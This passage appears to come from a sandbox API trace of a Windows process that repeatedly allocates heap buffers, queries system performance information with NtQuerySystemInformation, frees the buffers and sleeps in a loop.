HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0279.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.718] Sleep (dwMilliseconds=0x110) [0279.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0279.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0279.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0279.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0279.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0279.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0279.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0279.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0279.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.733] Sleep (dwMilliseconds=0x110) [0279.747] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0279.747] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.748] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0279.748] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0279.748] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0279.749] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0279.749] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.749] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0279.750] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0279.750] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0279.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.751] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.751] Sleep (dwMilliseconds=0x110) [0279.763] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0279.763] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0279.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0279.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.764] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0279.764] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b808 [0279.764] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b808, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b808, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.765] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b808 | out: hHeap=0x2560000) returned 1 [0279.765] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0279.765] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0279.766] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.766] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.766] Sleep (dwMilliseconds=0x110) [0279.778] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0279.778] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0279.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0279.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.780] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0279.780] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0279.780] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0279.781] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0279.781] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.781] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0279.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.782] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.782] Sleep (dwMilliseconds=0x110) [0279.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0279.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0279.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0279.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0279.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0279.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0279.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0279.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0279.796] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.796] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.796] Sleep (dwMilliseconds=0x110) [0279.810] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0279.810] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0279.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0279.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.811] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0279.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0279.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0279.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0279.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0279.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.812] Sleep (dwMilliseconds=0x110) [0279.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0279.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0279.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0279.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0279.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c350 [0279.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c350, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c350, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c350 | out: hHeap=0x2560000) returned 1 [0279.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0279.828] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.828] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0279.828] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.829] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.829] Sleep (dwMilliseconds=0x110) [0279.841] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0279.841] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.842] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0279.842] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0279.842] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0279.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0279.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0279.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0279.844] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0279.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.845] Sleep (dwMilliseconds=0x110) [0279.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0279.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0279.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0279.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0279.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0279.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0279.859] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d328 [0279.859] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d328, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d328, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d328 | out: hHeap=0x2560000) returned 1 [0279.860] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.860] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.860] Sleep (dwMilliseconds=0x110) [0279.875] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0279.875] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.876] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0279.876] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0279.876] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.878] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0279.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0279.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0279.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0279.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0279.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.881] Sleep (dwMilliseconds=0x110) [0279.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d520 [0279.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d520, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d520, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.889] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d520 | out: hHeap=0x2560000) returned 1 [0279.889] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0279.889] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0279.894] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bc30 [0279.894] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bc30, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bc30, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.895] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bc30 | out: hHeap=0x2560000) returned 1 [0279.895] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0279.895] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.896] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0279.896] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.897] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.897] Sleep (dwMilliseconds=0x110) [0279.914] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0279.914] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.915] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0279.915] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0279.915] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.916] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0279.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0279.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.920] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0279.920] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0279.920] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0279.921] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.921] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.921] Sleep (dwMilliseconds=0x110) [0279.939] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0279.939] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.940] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0279.940] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0279.940] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.941] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0279.941] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0279.941] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.942] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0279.942] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cf40 [0279.942] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cf40, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cf40, ResultLength=0x19ee88*=0xc0) returned 0x0 [0279.943] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cf40 | out: hHeap=0x2560000) returned 1 [0279.943] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0279.944] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0279.944] Sleep (dwMilliseconds=0x110) [0279.954] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0279.954] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.955] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0279.955] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0279.955] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.956] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0279.956] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0279.956] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0279.957] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0279.957] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0279.957] NtQuerySystemInformation (in: SystemInformationClass=0x8, 